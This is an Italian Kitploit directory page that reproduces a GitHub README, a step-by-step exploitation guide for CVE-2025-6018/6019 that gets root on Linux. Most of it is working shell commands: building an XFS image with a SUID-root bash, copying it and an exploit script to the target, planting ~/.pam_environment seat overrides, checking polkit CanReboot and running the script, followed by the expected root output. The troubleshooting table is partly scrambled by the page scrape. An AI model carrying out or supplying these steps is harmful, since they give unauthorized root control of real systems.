Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-6018 — Guida allo sfruttamento di CVE-2025-6018/6019 per l'escalation dei privilegi tramite manipolazione di immagini XFS e abuso di variabili d'ambiente PAM per ottenere accesso root su sistemi Linux. | Kitploit
Strumenti/GitHubGitHub/e1arth/cve-2025-6018
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingRed TeamingBinary Exploitation
GitHube1arth/cve-2025-6018

CVE-2025-6018

Guida allo sfruttamento di CVE-2025-6018/6019 per l'escalation dei privilegi tramite manipolazione di immagini XFS e abuso di variabili d'ambiente PAM per ottenere accesso root su sistemi Linux.

Vedi Repository
5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-6018 + CVE-2025-6019 Guida all'Escalation dei Privilegi

中文

📋 Passaggi Rapidi per lo Sfruttamento

Passo 1: Preparare l'Immagine XFS (Macchina Locale)

root@kitploit:~
# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# Verify (should show 300M)
ls -lh xfs.image

Passo 2: Caricare i File sul Target

root@kitploit:~
# Upload exploit script and image
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

Passo 3: Primo Accesso - Configurare PAM

root@kitploit:~
# SSH login to target
ssh [email protected]

# Write PAM environment variables
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# Verify configuration
cat ~/.pam_environment

# 🔥 Critical: Logout (to activate PAM config)
exit

Passo 4: Secondo Accesso - Eseguire l'Escalation dei Privilegi

root@kitploit:~
# Re-login via SSH (PAM config now active)
ssh [email protected]

# Verify PAM is active (should return "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# Execute privilege escalation script
bash exp.sh

✅ Indicatori di Successo

Se lo sfruttamento riesce, dovresti vedere:

root@kitploit:~
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!

════════════════════════════════════════════════════════════
║ ROOT FLAG                                               ║
║ <flag_here>                                             ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 Risoluzione dei Problemi

ProblemaSoluzione
restituisce

📌 Punti Chiave

  • ✅ Devi fare logout e re-login: La configurazione PAM ha effetto solo nelle nuove sessioni
  • ✅ Verifica CanReboot: Conferma che restituisca ('yes',) prima di eseguire lo script
  • ✅ Usa l'accesso SSH: Non usare esecuzioni di comandi tipo ssh -t user@host "cmd"

🐱 Gatto Custode

Se fallisce, assicurati che ogni passaggio sia eseguito rigorosamente in ordine!

Scarica lo strumento
CanReboot
('no',)
Assicurati di aver effettuato il logout e il re-login (Passo 3)
Errore Not authorizedControlla che il contenuto di ~/.pam_environment sia corretto
SUID bash non trovatoRicarica xfs.image e verifica che il bit SUID sia impostato